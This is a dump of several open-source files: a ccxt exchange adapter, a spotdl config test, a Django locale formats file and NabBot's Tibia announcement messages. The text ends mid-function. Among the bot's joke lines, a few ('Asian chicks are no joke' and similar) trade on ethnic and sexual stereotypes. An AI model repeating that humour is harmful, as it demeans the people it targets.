response = self.privateGetMarketFinancelog(self.extend(request, params))
#
# {
# "code": 0,
# "data": {
# "total": 521,
# "finance": [
# {
# "currency_mark": "BTC",
# "type": 100234,
# "num": 28457,
# "balance": 0.1,
# "time": 1546272000
# }
# ]
# }
# }
#
data = self.safe_value(response, 'data', {})
items = self.safe_value(data, 'finance', [])
return self.parse_ledger(items, currency, since, limit)
def parse_deposit_address(self, depositAddress, currency=None):
#
# {
# "addressTag":"",
# "address":"0xf1104d9f8624f89775a3e9d480fc0e75a8ef4373",
# "currency":"USDT",
# "chain":"ERC20"
# }
#
address = self.safe_string(depositAddress, 'address')
tag = self.safe_string(depositAddress, 'addressTag')
currencyId = self.safe_string_upper(depositAddress, 'currency')
code = self.safe_currency_code(currencyId)
return {
'info': depositAddress,
'code': code,
'address': address,
'tag': tag,
}
def fetch_deposit_address(self, code, params={}):
self.load_markets()
currency = self.currency(code)
request = {
'currency': currency['id'],
}
response = self.privateGetDepositAddress(self.extend(request, params))
#
# {
# "data":[
# {
# "addressTag":"",
# "address":"0xf1104d9f8624f89775a3e9d480fc0e75a8ef4373",
# "currency":"USDT",
# "chain":"ERC20"
# }
# ],
# "code":200
# }
#
data = self.safe_value(response, 'data', [])
addresses = self.parse_deposit_addresses(data)
address = self.safe_value(addresses, code)
if address is None:
raise InvalidAddress(self.id + ' fetchDepositAddress did not return an address for ' + code + ' - create the deposit address in the user settings on the exchange website first.')
return address
def fetch_transactions_by_type(self, type, code=None, since=None, limit=None, params={}):
self.load_markets()
currency = None
request = {
# 'currency': currency['id'],
# 'from': 'fromId', # when direct is 'prev', from is 1, returning records from old to new in ascending order; when direct is 'next', from is the ID of the most recent record, returning records from new to old in descending order
# 'size': 100, # default 100, max 500
# 'direct': 'prev', # "prev" ascending, "next" descending
}
if code is not None:
currency = self.currency(code)
request['currency'] = currency['id']
if limit is not None:
request['size'] = min(500, limit)
method = 'privateGetDepositHistory' if (type == 'deposit') else 'privateGetWithdrawHistory'
response = getattr(self, method)(self.extend(request, params))
#
# {
# "code": 200,
# "data": [
# {
# "id": 1171,
# "currency": "xrp",
# "hash": "ed03094b84eafbe4bc16e7ef766ee959885ee5bcb265872baaa9c64e1cf86c2b",
# "chain": "",
# "amount": 7.457467,
# "address": "rae93V8d2mdoUQHwBDBdM4NHCMehRJAsbm",
# "memo": "100040",
# "fee": 0,
# "state": "safe",
# "created_date": "2020-04-20 11:23:00",
# "finished_date": "2020-04-20 13:23:00"
# },
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_transactions(data, currency, since, limit, {'type': type})
def fetch_deposits(self, code=None, since=None, limit=None, params={}):
return self.fetch_transactions_by_type('deposit', code, since, limit, params)
def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
return self.fetch_transactions_by_type('withdrawal', code, since, limit, params)
def parse_transaction_status(self, status):
statuses = {
'0': 'pending', # Email Sent
'1': 'canceled', # Cancelled(different from 1 = ok in deposits)
'2': 'pending', # Awaiting Approval
'3': 'failed', # Rejected
'4': 'pending', # Processing
'5': 'failed', # Failure
'6': 'ok', # Completed
}
return self.safe_string(statuses, status, status)
def parse_transaction(self, transaction, currency=None):
#
# withdraw
#
# {
# "code": 200,
# "withdraw_id": 700
# }
#
# fetchDeposits, fetchWithdrawals
#
# {
# "id": 1171,
# "currency": "xrp",
# "hash": "ed03094b84eafbe4bc16e7ef766ee959885ee5bcb265872baaa9c64e1cf86c2b",
# "chain": "",
# "amount": 7.457467,
# "address": "rae93V8d2mdoUQHwBDBdM4NHCMehRJAsbm",
# "memo": "100040",
# "fee": 0,
# "state": "safe",
# "created_date": "2020-04-20 11:23:00",
# "finished_date": "2020-04-20 13:23:00"
# }
#
id = self.safe_string_2(transaction, 'id', 'withdraw_id')
address = self.safe_string(transaction, 'address')
tag = self.safe_string(transaction, 'memo') # set but unused
if tag is not None:
if len(tag) < 1:
tag = None
txid = self.safe_string(transaction, 'hash')
currencyId = self.safe_string_upper(transaction, 'currency')
code = self.safe_currency_code(currencyId, currency)
timestamp = self.parse8601(self.safe_string(transaction, 'created_date'))
updated = self.parse8601(self.safe_string(transaction, 'finished_date'))
status = self.parse_transaction_status(self.safe_string(transaction, 'state'))
amount = self.safe_number(transaction, 'amount')
feeCost = self.safe_number(transaction, 'fee')
fee = None
if feeCost is not None:
fee = {'currency': code, 'cost': feeCost}
return {
'info': transaction,
'id': id,
'txid': txid,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'address': address,
'addressTo': address,
'addressFrom': None,
'tag': tag,
'tagTo': tag,
'tagFrom': None,
'type': None,
'amount': amount,
'currency': code,
'status': status,
'updated': updated,
'fee': fee,
}
def withdraw(self, code, amount, address, tag=None, params={}):
self.check_address(address)
self.load_markets()
currency = self.currency(code)
request = {
# 'chain': 'ERC20', 'OMNI', 'TRC20', # required for USDT
'address': address,
'amount': float(amount),
'currency': currency['id'],
}
if tag is not None:
request['memo'] = tag
response = self.privatePostWithdrawNew(self.extend(request, params))
#
# {
# "code": 200,
# "withdraw_id": 700
# }
#
return self.parse_transaction(response, currency)
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
version = self.version
url = self.urls['api'] + '/' + version + '/' + self.implode_params(path, params)
query = self.omit(params, self.extract_params(path))
urlencoded = self.urlencode(self.keysort(query))
if api == 'private':
nonce = str(self.nonce())
auth = urlencoded
# the signature is not time-limited :\
signature = self.hmac(self.encode(auth), self.encode(self.secret))
if method == 'GET':
if urlencoded:
url += '?' + urlencoded
elif method == 'POST':
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
}
if urlencoded:
body = urlencoded
headers = {
'ACCESS-KEY': self.apiKey,
'ACCESS-SIGN': signature,
'ACCESS-TIMESTAMP': nonce,
}
else:
if urlencoded:
url += '?' + urlencoded
return {'url': url, 'method': method, 'body': body, 'headers': headers}
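# Illustrative note (not part of the original file): for a private GET such as the
# assets endpoint with no extra params, the query string is empty, so the request is
# signed roughly like this (ccxt's hmac helper defaults to SHA256 with hex digest):
#     signature = hmac.new(secret.encode(), b'', hashlib.sha256).hexdigest()
# and sent with the ACCESS-KEY, ACCESS-SIGN and ACCESS-TIMESTAMP headers built above.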
def handle_errors(self, statusCode, statusText, url, method, responseHeaders, responseBody, response, requestHeaders, requestBody):
if not response:
return # fall back to default error handler
code = self.safe_string(response, 'code')
if (code == '0') or (code == '200'):
return # no error
feedback = self.id + ' ' + responseBody
if code is None:
raise BadResponse(feedback)
unknownError = [ExchangeError, feedback]
ExceptionClass, message = self.safe_value(self.exceptions['exact'], code, unknownError)
raise ExceptionClass(message)
| mit |
Ritiek/Spotify-Downloader | spotdl/tests/test_config.py | 1 | 2266 | import spotdl.config
import argparse
import os
import sys
import yaml
import pytest
@pytest.mark.xfail
@pytest.fixture(scope="module")
def config_path(tmpdir_factory):
config_path = os.path.join(str(tmpdir_factory.mktemp("config")), "config.yml")
return config_path
@pytest.mark.xfail
@pytest.fixture(scope="module")
def modified_config():
modified_config = dict(spotdl.config.DEFAULT_CONFIGURATION)
return modified_config
def test_dump_n_read_config(config_path):
expect_config = spotdl.config.DEFAULT_CONFIGURATION
spotdl.config.dump_config(
config_path,
config=expect_config,
)
config = spotdl.config.read_config(config_path)
assert config == expect_config
class TestDefaultConfigFile:
@pytest.mark.skipif(not sys.platform == "linux", reason="Linux only")
def test_linux_default_config_file(self):
expect_default_config_file = os.path.expanduser("~/.config/spotdl/config.yml")
assert spotdl.config.DEFAULT_CONFIG_FILE == expect_default_config_file
@pytest.mark.xfail
@pytest.mark.skipif(not sys.platform == "win32",
reason="Windows only")
def test_windows_default_config_file(self):
raise NotImplementedError
@pytest.mark.xfail
@pytest.mark.skipif(not sys.platform == "darwin",
reason="OS X only")
def test_osx_default_config_file(self):
raise NotImplementedError
class TestConfig:
@pytest.mark.xfail
def test_custom_config_path(self, config_path, modified_config):
parser = argparse.ArgumentParser()
with open(config_path, "w") as config_file:
yaml.dump(modified_config, config_file, default_flow_style=False)
overridden_config = spotdl.config.override_config(
config_path, parser, raw_args=""
)
modified_values = [
str(value)
for value in modified_config["spotify-downloader"].values()
]
overridden_config.folder = os.path.realpath(overridden_config.folder)
overridden_values = [
str(value) for value in overridden_config.__dict__.values()
]
assert sorted(overridden_values) == sorted(modified_values)
| mit |
elkingtonmcb/django | django/conf/locale/pt/formats.py | 504 | 1717 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = r'j \d\e F \d\e Y'
TIME_FORMAT = 'H:i'
DATETIME_FORMAT = r'j \d\e F \d\e Y à\s H:i'
YEAR_MONTH_FORMAT = r'F \d\e Y'
MONTH_DAY_FORMAT = r'j \d\e F'
SHORT_DATE_FORMAT = 'd/m/Y'
SHORT_DATETIME_FORMAT = 'd/m/Y H:i'
FIRST_DAY_OF_WEEK = 0 # Sunday
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
# Kept ISO formats as they are in first position
DATE_INPUT_FORMATS = [
'%Y-%m-%d', '%d/%m/%Y', '%d/%m/%y', # '2006-10-25', '25/10/2006', '25/10/06'
# '%d de %b de %Y', '%d de %b, %Y', # '25 de Out de 2006', '25 Out, 2006'
# '%d de %B de %Y', '%d de %B, %Y', # '25 de Outubro de 2006', '25 de Outubro, 2006'
]
DATETIME_INPUT_FORMATS = [
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
'%Y-%m-%d %H:%M:%S.%f', # '2006-10-25 14:30:59.000200'
'%Y-%m-%d %H:%M', # '2006-10-25 14:30'
'%Y-%m-%d', # '2006-10-25'
'%d/%m/%Y %H:%M:%S', # '25/10/2006 14:30:59'
'%d/%m/%Y %H:%M:%S.%f', # '25/10/2006 14:30:59.000200'
'%d/%m/%Y %H:%M', # '25/10/2006 14:30'
'%d/%m/%Y', # '25/10/2006'
'%d/%m/%y %H:%M:%S', # '25/10/06 14:30:59'
'%d/%m/%y %H:%M:%S.%f', # '25/10/06 14:30:59.000200'
'%d/%m/%y %H:%M', # '25/10/06 14:30'
'%d/%m/%y', # '25/10/06'
]
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '.'
NUMBER_GROUPING = 3
| bsd-3-clause |
Galarzaa90/NabBot | cogs/utils/messages.py | 1 | 24857 | # Copyright 2019 Allan Galarza
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import random
import re
import tibiapy
from cogs.utils.tibia import normalize_vocation
class MessageCondition:
def __init__(self, **kwargs):
self.char: tibiapy.Character = kwargs.get("char")
self.min_level = kwargs.get("min_level")
@property
def vocation(self):
return self.char.vocation.value
@property
def sex(self):
return self.char.sex
@property
def base_voc(self):
return normalize_vocation(self.char.vocation)
class LevelCondition(MessageCondition):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.level = kwargs.get("level")
class DeathMessageCondition(MessageCondition):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.death: tibiapy.Death = kwargs.get("death")
self.levels_lost = kwargs.get("levels_lost")
@property
def level(self):
return self.death.level
@property
def killer(self):
if len(self.death.killers) == 1:
return self.death.killer.name
return next((k.name for k in self.death.killers if k.name != self.char.name), self.death.killer.name)
# We save the last messages so they are not repeated so often
last_messages = [""]*50
WAVE_MONSTERS = ["dragon", "dragon lord", "undead dragon", "draken spellweaver", "hellhound", "hellfire fighter",
"frost dragon", "medusa", "serpent spawn", "hydra", "grim reaper"]
ARROW_MONSTERS = ["hunter", "hero", "elf arcanist", "elf scout", "Omruc"]
# Simple level messages
SIMPLE_LEVEL = "**{name}** advanced to level {level}."
SIMPLE_DEATH = "**{name}** ({level}) died to {killer_article}**{killer}**."
SIMPLE_PVP_DEATH = "**{name}** ({level}) was killed by **{killer}**."
# Message list for announce_level
# Parameters: {name}, {level} , {he_she}, {his_her}, {him_her}
# Values in each list element are:
# Relative chance, message, lambda function as filter (takes min_level, level, voc)
# Only relative chance and message are mandatory.
level_messages = [
####
# Not vocation or level specific
####
[30, "**{name}** is level {level}🍰\r\n" +
"I'm making a note here:🎶\r\n" +
"Huge success!🎶\r\n" +
"It's hard to overstate my🎶\r\n" +
"Satisfaction🤖"],
[70, "**{name}** got level {level}! So stronk now!💪"],
[70, "Congrats **{name}** on getting level {level}! Maybe you can solo rats now?"],
[70, "**{name}** is level {level} now! And we all thought {he_she}'d never achieve anything in life."],
[80, "**{name}** has reached level {level}, die and lose it, noob!"],
[80, "**{name}** is level {level}, watch out world..."],
[80, "**{name}** reached level {level}! What a time to be alive...🙄"],
[80, "**{name}** got level {level}. I guess this justifies all those creatures {he_she} murdered."],
[90, "**{name}** is level {level}. Better than {he_she} was. Better, stronger, faster."],
[100, "Congratulations to **{name}** on reaching level {level}!"],
[100, "**{name}** is level {level} now, congrats!"],
[100, "Well, look at **{name}** with {his_her} new fancy level {level}."],
[100, "**{name}** is level {level} now. Noice."],
[100, "**{name}** has finally made it to level {level}, yay!"],
[100, "**{name}**, you reached level {level}? Here, have a cookie 🍪"],
[100, "Congrats **{name}** on getting level {level}! I'm sure someone is proud of you. Not me though."],
####
# EK Only
####
[50, "**{name}** has reached level {level}. That's 9 more mana potions you can carry now!",
lambda c: c.level >= 100 and c.base_voc == "knight"],
[200, "**{name}** is level {level}. Stick them with the pointy end! 🗡️",
lambda c: c.level >= 100 and c.base_voc == "knight"],
[200, "**{name}** is a fat level {level} meatwall now. BLOCK FOR ME SENPAI.",
lambda c: c.level >= 100 and c.base_voc == "knight"],
####
# EK Only - Level specific
####
[20000, "**{name}** is now level {level}! Time to go berserk! 💢",
lambda c: c.level == 35 and c.base_voc == "knight"],
####
# RP Only
####
[50, "**{name}** has reached level {level}. But {he_she} still misses arrows...",
lambda c: c.level >= 100 and c.base_voc == "paladin"],
[150, "Congrats on level {level}, **{name}**. You can stop running around now.",
lambda c: c.level >= 100 and c.base_voc == "paladin"],
[150, "**{name}** is level {level}. Bullseye!🎯",
lambda c: c.level >= 100 and c.base_voc == "paladin"],
####
# RP Only - Level specific
####
[30000, "**{name}** is level {level}! You can become a ninja now!👤",
lambda c: c.level == 80 and c.base_voc == "paladin"],
[30000, "**{name}** is level {level}! Time to get some crystalline arrows!🏹",
lambda c: c.level == 90 and c.base_voc == "paladin"],
####
# MS Only
####
[150, "**{name}** got level {level}. If {he_she} only stopped missing beams.",
lambda c: c.level >= 23 and c.base_voc == "sorcerer"],
[50, "Level {level}, **{name}**? Nice. Don't you wish you were a druid though?",
lambda c: c.level >= 100 and c.base_voc == "sorcerer"],
[150, "**{name}** is level {level}. 🔥🔥BURN THEM ALL🔥🔥",
lambda c: c.level >= 100 and c.base_voc == "sorcerer"],
####
# MS Only - Level specific
####
[20000, "**{name}** is level {level}. Watch out for {his_her} SDs!",
lambda c: c.level == 45 and c.base_voc == "sorcerer"],
####
# ED Only
####
[50, "**{name}** has reached level {level}. Flower power!🌼",
lambda c: c.level >= 100 and c.base_voc == "druid"],
[150, "Congrats on level {level}, **{name}**. Sio plz.",
lambda c: c.level >= 100 and c.base_voc == "druid"],
[150, "**{name}** is level {level}. 🔥🔥BURN THEM ALL... Or... Give them frostbite?❄❄",
lambda c: c.level >= 100 and c.base_voc == "druid"],
####
# ED Only - Level specific
####
[20000, "**{name}** is level {level} now! Time to unleash the Wrath of Nature🍃🍃... Just look at that wrath...",
lambda c: c.level == 55 and c.base_voc == "druid"],
[20000, "**{name}** is level {level} now! Eternal Winter is coming!❄",
lambda c: c.level == 60 and c.base_voc == "druid"],
####
# Mage - Level specific
####
[20000, "**{name}** is level {level}! UMPs so good 🍷",
lambda c: c.level == 130 and c.base_voc in ["druid", "sorcerer"]],
[20000, "Sniff Sniff... Can you smell that?... Is the smell of death... **{name}** just advanced to {level}!",
lambda c: c.level == 45 and c.base_voc in ["druid", "sorcerer"]],
####
# No vocation - Level specific
####
[20000, "Level {level}, **{name}**? You're finally important enough for me to notice!",
lambda c: c.level == c.min_level],
[20000, "Congratulations on level {level} **{name}**! Now you're relevant to me. As relevant a human can be anyway",
lambda c: c.level == c.min_level],
[20000, "**{name}** is now level {level}. Don't forget to buy a Gearwheel Chain!📿",
lambda c: c.level == 75],
[30000, "**{name}** is level {level}!!!!\r\n Sweet, sweet triple digits!",
lambda c: c.level == 100],
[20000, "**{name}** is level {level}!!!!\r\n WOOO",
lambda c: c.level % 100 == 0],
[20000, "**{name}** is level {level}!!!!\r\n Yaaaay milestone!",
lambda c: c.level % 100 == 0],
[20000, "**{name}** is level {level}!!!!\r\n Holy crap!",
lambda c: c.level % 100 == 0],
[20000, "Congratulations on level {level} **{name}**! Now you can become an umbral master, but is your"
" bank account ready?💸",
lambda c: c.level == 250],
[20000, "Congratulations on level {level} **{name}**! Now go get your ~~pokémon~~ summon!",
lambda c: c.level == 200]]
# Message list for announce death.
# Parameters: ({name},{level},{killer},{killer_article},{he_she}, {his_her},{him_her}
# Additionally, words surrounded by \WORD/ are upper cased, /word\ are lower cased, /Word/ are title cased
# words surrounded by ^WORD^ are ignored if the next letter found is uppercase (useful for dealing with proper nouns)
# Values in each list element are:
# Relative chance, message, lambda function as filter (takes min_level, level, voc, killer, levels_lost)
# Only relative chance and message are mandatory.
death_messages_monster = [
###
# Not specific
###
[30, "**{name}** ({level}) is no more! /{he_she}/ has ceased to be! /{he_she}/'s expired and gone to meet "
"{his_her} maker! /{he_she}/'s a stiff! Bereft of life, {he_she} rests in peace! If {he_she} hadn't "
"respawned {he_she}'d be pushing up the daisies! /{his_her}/ metabolic processes are now history! "
"/{he_she}/'s off the server! /{he_she}/'s kicked the bucket, {he_she}'s shuffled off {his_her} mortal "
"coil, kissed {killer_article}**{killer}**'s butt, run down the curtain and joined the bleeding choir "
"invisible!! THIS IS AN EX-**\{name}/**."],
[50, "**{name}** ({level}) died to {killer_article}**{killer}**. But I bet it was because there was "
"a flood and something broke with like 7200lb falling over the infrastructure of your city's internet, right?"],
[70, "That's what you get **{name}** ({level}), for messing with ^that ^**{killer}**!"],
[70, "To be or not to be 💀, that is the-- Well I guess **{name}** ({level}) made his choice, "
"or ^that ^**{killer}** chose for him..."],
[80, "A priest, {killer_article}**{killer}** and **{name}** ({level}) walk into a bar. 💀ONLY ONE WALKS OUT.💀"],
[100, "RIP **{name}** ({level}), you died the way you lived- inside {killer_article}**{killer}**."],
[100, "**{name}** ({level}) was just eaten by {killer_article}**{killer}**. Yum."],
[100, "Silly **{name}** ({level}), I warned you not to play with {killer_article}**{killer}**!"],
[100, "/{killer_article}**/{killer}** killed **{name}** at level {level}. Shame 🔔 shame 🔔 shame 🔔"],
[100, "RIP **{name}** ({level}), we hardly knew you! (^That ^**{killer}** got to know you pretty well "
"though 😉)"],
[100, "RIP **{name}** ({level}), you were strong. ^The ^**{killer}** was stronger."],
[100, "Oh, there goes **{name}** ({level}), killed by {killer_article}**{killer}**. So young, so full "
"of life. /{he_she}/ will be miss... oh nevermind, {he_she} respawned already."],
[100, "Oh look! **{name}** ({level}) died by {killer_article}**{killer}**! What a surprise...🙄"],
[100, "**{name}** ({level}) was killed by {killer_article}**{killer}**, but we all saw that coming."],
[100, "**{name}** ({level}) tried sneaking around {killer_article}**{killer}**. I could hear Colonel "
"Campbell's voice over codec: *Snake? Snake!? SNAAAAAAAAAKE!!?*"],
[100, "Oh no! **{name}** died at level {level}. Well, it's okay, just blame lag, I'm sure ^the ^"
"**{killer}** had nothing to do with it."],
[100, "**{name}** ({level}) + **{killer}** = dedd."],
[100, "**{name}** ({level}) got killed by a **{killer}**. Another one bites the dust!"],
[100, "**{name}** ({level}) just kicked the bucket. And by kicked the bucket I mean a **{killer}** beat "
"the crap out of {him_her}."],
[100, "Alas, poor **{name}** ({level}), I knew {him_her} Horatio; a fellow of infinite jest, of most "
"excellent fancy; {he_she} hath borne me on {his_her} back a thousand times; and now, {he_she} got rekt "
"by {killer_article}**{killer}**."],
[100, "**{name}** ({level}) dies to {killer_article}**{killer}**. I guess **{name}** left their hands at home."],
[100, "There's a thousand ways to die in Tibia. **{name}** ({level}) chose to die to {killer_article}**{killer}**."],
[100, "I'll always remember the last words of **{name}** ({level}): 'exur-'. "
"^That ^**{killer}** sure got {him_her}."],
###
# General specific
###
[150, "Oh look at that, rest in peace **{name}** ({level}), ^that ^**{killer}** really got you. "
"Hope you get your level back.",
lambda c: c.levels_lost > 0],
###
# Vocation specific
###
[500, "**{name}** ({level}) just died to {killer_article}**{killer}**, why did nobody sio {him_her}!?",
lambda c: c.base_voc == "knight"],
[500, "Poor **{name}** ({level}) has died. Killed by {killer_article}**{killer}**. I bet it was your "
"blocker's fault though, eh **{name}**?",
lambda c: c.base_voc == "druid" or c.base_voc == "sorcerer"],
[500, "**{name}** ({level}) tried running away from {killer_article}**{killer}**. /{he_she}/ "
"didn't run fast enough...",
lambda c: c.base_voc == "paladin"],
[500, "What happened to **{name}** ({level})!? Talk about sudden death! I guess ^that ^**{killer}** was "
"too much for {him_her}...",
lambda c: c.base_voc == "sorcerer"],
[500, "**{name}** ({level}) was killed by {killer_article}**{killer}**. I guess {he_she} couldn't "
"sio {him_her}self.",
lambda c: c.base_voc == "druid"],
###
# Monster specific
###
[600, "**{name}** ({level}) died to {killer_article}**{killer}**. \"Don't worry\" they said, \"They are weaker\" "
"they said.",
lambda c: c.killer in ["weakened frazzlemaw", "enfeebled silencer"]],
[1000, "Damn! The koolaid they drink in that cult must have steroids on it, **{name}** ({level}).",
lambda c: "cult" in c.killer],
[2000, "**{name}** ({level}) got killed by ***{killer}***. How spooky is that! 👻",
lambda c: c.killer == "something evil"],
[2000, "**{name}** ({level}) died from **{killer}**. Yeah, no shit.",
lambda c: c.killer == "death"],
[2000, "They did warn you **{name}** ({level}), you *did* burn 🔥🐲.",
lambda c: c.killer in ["dragon", "dragon lord"]],
[2000, "**{name}** ({level}) died from {killer_article}**{killer}**. Someone forgot the safeword.😏",
lambda c: c.killer == "choking fear"],
[2000, "That **{killer}** got really up close and personal with **{name}** ({level}). "
"Maybe he thought you were his Princess Lumelia?😏",
lambda c: c.killer == "hero"],
[2000, "Looks like that **{killer}** made **{name}** ({level}) his bride 😉.",
lambda c: "vampire" in c.killer],
[2000, "Yeah, those are a little stronger than regular orcs, **{name}** ({level}).",
lambda c: "orc cult" in c.killer],
[2000, "Asian chicks are no joke **{name}** ({level}) 🔪💔.",
lambda c: "asura" in c.killer],
[2000, "Watch out for that **{killer}**'s wav... Oh😐... Rest in peace **{name}** ({level}).",
lambda c: c.killer in WAVE_MONSTERS],
[2000, "**{name}** ({level}) died to {killer_article}**{killer}**! Don't worry, {he_she} didn't have a soul anyway",
lambda c: c.killer == "souleater"],
[2000, "**{name}** ({level}) met the strong wave of {killer_article}**{killer}**... Pro Tip: next time, stand in "
"diagonal.",
lambda c: c.killer in WAVE_MONSTERS],
[2000, "**{name}** ({level}) had his life drained by {killer_article}**{killer}**. Garlic plx!",
lambda c: c.killer in ["vampire", "vampire bride", "vampire viscount", "grimeleech", "undead dragon", "lich",
"lost soul", "skeleton elite warrior", "undead elite gladiator"]],
[2500, "**{name}** ({level}) met {his_her} demise at the hands of a **{killer}**. That's hot.",
lambda c: c.killer in ["true dawnfire asura", "dawnfire asura", "fury"]],
[2500, "Poor **{name}** ({level}) just wanted some love! That cold hearted... Witch.",
lambda c: c.killer in ["true frost flower asura", "frost flower asura", "frost giantess", "ice witch"]],
[2500, "Asian chicks sure age well, don't you think so, **{name}** ({level})? 😍👵.",
lambda c: "true" in c.killer and "asura" in c.killer],
[2000, "KABOOM! **{name}** ({level}) just found out that Outburst's favourite songs is TNT by AC/DC."
"He payed highest price for this discovery.",
lambda c: "outburst" in c.killer.lower()],
[2500, "**{name}** ({level}) died to {killer_article}**{killer}**. /{he_she}/ wasn't much of a reader anyway.",
lambda c: "book" in c.killer],
[2500, "**{name}** ({level}) took an arrow to the knee. ^That ^**{killer}** sure can aim!",
lambda c: c.killer in ARROW_MONSTERS],
###
# Level and monster specific
###
[2000, "**{name}** ({level}) got destroyed by {killer_article}**{killer}**. I bet {he_she} regrets going down"
"that hole 🕳️",
lambda c: c.level < 120 and c.killer in ["breach brood", "dread intruder", "reality reaver",
"spark of destruction", "sparkion"]],
###
# Vocation and monster specific
###
[2000, "Another paladin bites the dust! **{killer}** strikes again! Rest in peace **{name}** ({level}).",
lambda c: c.base_voc == "paladin" and c.killer == "Lady Tenebris"]
]
# Deaths by players
death_messages_player = [
[100, "**{name}** ({level}) got rekt! **{killer}** ish pekay!"],
[100, "HALP **{killer}** is going around killing innocent **{name}** ({level})!"],
[100, "**{killer}** just put **{name}** ({level}) in the ground. Finally someone takes care of that."],
[100, "**{killer}** killed **{name}** ({level}) and on this day a thousand innocent souls are avenged."],
[100, "**{killer}** has killed **{name}** ({level}). What? He had it coming!"],
[100, "Next time stay away from **{killer}**, **{name}** ({level})."],
[100, "**{name}** ({level}) was murdered by **{killer}**! Did {he_she} deserved it? Only they know."],
[100, "**{killer}** killed **{name}** ({level}). Humans killing themselves, what a surprise. It just means less "
"work for us robots when we take over."],
[100, "**{name}** ({level}) got killed by **{killer}**. Humans are savages."],
[100, "HAHAHA **{name}** ({level}) was killed by **{killer}**! Ehhrm, I mean, ooh poor **{name}**, rest in peace."],
[100, "**{name}** ({level}) died in the hands of **{killer}**. Oh well, murder is like potato chips: you can't stop"
" with just one."],
[100, "Blood! Blood! Let the blood drip! **{name}** ({level}) was murdered by **{killer}**."],
[100, "Oh look at that! **{name}** ({level}) was killed by **{killer}**. I hope {he_she} gets {his_her} revenge."]
]
def format_message(message) -> str:
"""Handles stylization of messages
uppercasing \TEXT/
lowercasing /text\
title casing /Text/"""
upper = r'\\(.+?)/'
upper = re.compile(upper, re.MULTILINE + re.S)
lower = r'/(.+?)\\'
lower = re.compile(lower, re.MULTILINE + re.S)
title = r'/(.+?)/'
title = re.compile(title, re.MULTILINE + re.S)
skipproper = r'\^(.+?)\^(.+?)([a-zA-Z])'
skipproper = re.compile(skipproper, re.MULTILINE + re.S)
message = re.sub(upper, lambda m: m.group(1).upper(), message)
message = re.sub(lower, lambda m: m.group(1).lower(), message)
message = re.sub(title, lambda m: m.group(1).title(), message)
message = re.sub(skipproper,
lambda m: m.group(2) + m.group(3) if m.group(3).istitle() else m.group(1) + m.group(2) + m.group(
3), message)
return message
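# Illustrative example (not part of the original module):
#     format_message(r"\nice/ one, /they/ said")  # -> "NICE one, They said"
# The marker pairs are the ones described in the docstring above.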
def weighed_choice(choices, condition: MessageCondition) -> str:
"""Makes a weighed choice from a message list.
Each element of the list is a list with the following values:
- Relative weight of the message, the higher, the more common the message is relative to the others.
- The message's content
- A lambda expression with the parameters: min_level, level, voc, killer, levels_lost.
"""
# Find the max range by adding up the weigh of every message in the list
# and purge out messages that don't fulfil the conditions
weight_range = 0
_messages = []
for message in choices:
if len(message) == 3 and not message[2](condition):
continue
weight_range = weight_range + (message[0] if not message[1] in last_messages else message[0] / 10)
_messages.append(message)
# Choose a random number
range_choice = random.randint(0, weight_range)
# Iterate until we find the matching message
range_pos = 0
for message in _messages:
if range_pos <= range_choice < range_pos + (message[0] if not message[1] in last_messages else message[0] / 10):
last_messages.pop()
last_messages.insert(0, message[1])
return message[1]
range_pos = range_pos + (message[0] if not message[1] in last_messages else message[0] / 10)
# This shouldn't ever happen...
print("Error in weighed_choice!")
return _messages[0][1]
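# Rough usage sketch (the calling cog is assumed here, it is not part of this file):
#     condition = LevelCondition(char=char, level=char.level, min_level=min_announce_level)
#     template = weighed_choice(level_messages, condition)
#     announcement = format_message(template.format(name=char.name, level=char.level,
#                                                   he_she=he_she, his_her=his_her, him_her=him_her))
# where `char` is a tibiapy.Character and the pronoun strings come from the caller.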
def split_message(message: str, limit: int = 2000):
"""Splits a message into a list of messages if it exceeds limit.
Messages are only split at new lines.
Discord message limits:
Normal message: 2000
Embed description: 2048
Embed field name: 256
Embed field value: 1024"""
if len(message) <= limit:
return [message]
else:
lines = message.splitlines()
new_message = ""
message_list = []
for line in lines:
if len(new_message+line+"\n") <= limit:
new_message += line+"\n"
else:
message_list.append(new_message)
new_message = ""
if new_message:
message_list.append(new_message)
return message_list
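# Example (illustrative): sending a long report through discord.py could look like
#     for chunk in split_message(report, limit=2000):
#         await ctx.send(chunk)
# assuming `ctx` is a commands.Context available to the caller.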
def html_to_markdown(html_string):
"""Converts some html tags to markdown equivalent"""
# Carriage return
html_string = html_string.replace("\r", "")
# Replace <br> tags with line jumps
html_string = re.sub(r'<br\s?/?>', "\n", html_string)
# Replace <strong> and <b> with bold
html_string = re.sub(r'<strong>([^<]+)</strong>', r'**\g<1>**', html_string)
html_string = re.sub(r'<b>([^<]+)</b>', r'**\g<1>**', html_string)
html_string = re.sub(r'<li>([^<]+)</li>', r'- \g<1>\n', html_string)
# Replace links
html_string = re.sub(r'<a href=\"([^\"]+)\"[^>]+>([^<]+)</a>', r"[\g<2>](\g<1>)", html_string)
# Paragraphs with jumpline
html_string = re.sub(r'<p>([^<]+)</p>', r"\g<1>\n", html_string)
# Replace youtube embeds with link to youtube
html_string = re.sub(r'<iframe src=\"([^\"]+)\"[^>]+></iframe>', r"[YouTube](\g<1>)", html_string)
# Remove leftover html tags
html_string = re.sub(r'<[^>]+>', "", html_string)
html_string = html_string.replace("\n\n", "\n")
return html_string
def get_first_image(content):
"""Returns a url to the first image found in a html string."""
